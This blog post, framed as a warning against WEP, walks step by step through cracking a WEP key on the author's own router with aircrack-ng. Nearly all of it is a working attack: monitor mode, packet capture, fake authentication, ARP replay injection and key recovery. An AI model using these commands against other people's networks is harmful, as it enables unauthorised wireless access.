I have noticed (while connecting to my own AP) that many people around still use WEP encryption and I just felt dizzy… After I have counted to 10 I have decided to write this up:
Cracking WEP by AndrzejL aka one of the reasons why You SHOULD NEVER USE WEP to secure Your router!
This is NOT a “HOW TO CRACK WEP” tutorial. This is a warning. Warning that should be taken as “WOW! This WEP stuff is really not secure… I better change my router to personal WPA2 right away…”. Please do not use this knowledge to do illegal stuff. I used my own wireless router in my own wireless network for this demonstration. Breaking into WEP secured networks is illegal. You have been warned.
0) Install aircrack-ng-svn from ArchLinux AUR repository:
FIRST WINDOW:
1) Check the name of the wireless interface
iwconfig
says it’s wlan0
2) Check mac address of wlan0
ifconfig wlan0
says YY:YY:YY:YY:YY:YY
3) Optional – not necessary under Backtrack. Kill unnecessary network services that can mess You up:
airmon-ng check kill
Example:
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!PID Name
23899 ifplugd
Killing all those processes…
4) Create wireless interface in monitor mode:
airmon-ng start wlan0
5) Check the name of the wireless monitor mode interface
iwconfig
says it’s mon0
6) Start sniffing to collect router’s data
airodump-ng mon0
Stop airodump with CTRL + C
Information gathered:
Router’s BSSID: XX:XX:XX:XX:XX:XX
Router’s ESSID: Arch_Linux_User
- INFO: If ESSID contains spaces put it in the “” or ‘ ‘ in next commands ie “Arch Linux User” or ‘Arch Linux User’.
Router’s CHANNEL: ZZ
7) Kill mon0 interface:
airmon-ng stop mon0
8) Start mon0 fixed at the AP’s channel:
airmon-ng start wlan0 ZZ
9) Now re-write Your sniffing command so it sniffs the right channel / bssid and so it saves the captured packets into a file:
airodump-ng -c ZZ --bssid XX:XX:XX:XX:XX:XX -w ./output mon0
- IF You get “Fixed channel mon0: -1” in the right hand corner of the sniffer – then rewrite Your command again by adding –ignore-negative-one so it looks like this:
airodump-ng -c ZZ --bssid XX:XX:XX:XX:XX:XX --ignore-negative-one -w ./output mon0
- Leave this command running and saving packets.
SECOND WINDOW:
10) Check if the card is capable of packet injection:
aireplay-ng -9 mon0
- 16:10:47 Injection is working!
11) Try to auth with router:
aireplay-ng -1 0 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY mon0
- if You get this error:
16:20:36 Waiting for beacon frame (XX:XX:XX:XX:XX:XX) on channel -1
15:38:33 Couldn’t determine current channel for mon0, you should either force the operation with –ignore-negative-one or apply a kernel patch.
- just rewrite Your command by adding “–ignore-negative-one” switch.
Example:
aireplay-ng -1 0 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0
This command will (should) auth You with a router and then give You the prompt back.
0 – this can take a value between 0 and 512 (experiment)
-e router’s ESSID
-a router’s BSSID
-h Your card’s MAC address
–ignore-negative-one fixes the above mentioned error
IF You want to stop this command use CTRL + C
16:16:28 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1
16:16:28 Sending Authentication Request (Open System) [ACK]
16:16:28 Authentication successful
16:16:28 Sending Association Request [ACK]
16:16:28 Association successful 🙂 (AID: 1)
🙂 now fiddle with the “0” in the command – change it’s values to something between 1 and 512.
Example:
aireplay-ng -1 1 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0
- Leave this command running.
THIRD WINDOW:
12) Start to inject:
aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY mon0
- If You get these errors:
16:21:36 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1
16:21:36 Couldn’t determine current channel for mon0, you should either force the operation with –ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
- rewrite the command by adding “-e Arch_Linux_User” and “–ignore-negative-one” switches.
Example:
aireplay-ng -3 -e Arch_Linux_User -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0
Meanwhile You can (but You do not have to) fiddle with the airmon-ng “-1” command in the second window. Change the value of “0” to different values between 1 and 512 – see which is better for You… Sometimes 1 will do juuuust fine.
- After a while You _should_ receive ARP request packet… and… START TO INJECT THEM.
FOURTH WINDOW:
13) When collected some ARP packets You can start the cracking process:
aircrack-ng -z ./output*.cap
and soon after that You should be able to see this sort of message:
KEY FOUND! [ 2C:BD:3D:AC:D5:97:59:57:28:CE:3C:B9:F5 ]
Decrypted correctly: 100%
That’s it… You’re all done…
It takes less then 5 minutes to crack WEP key… 5 minutes guys and girls… and Your wireless network has been compromised… Now please tell me that You have changed the default administrator’s password for the router? Please please tell me You did at least that…
Cheers.
AndrzejL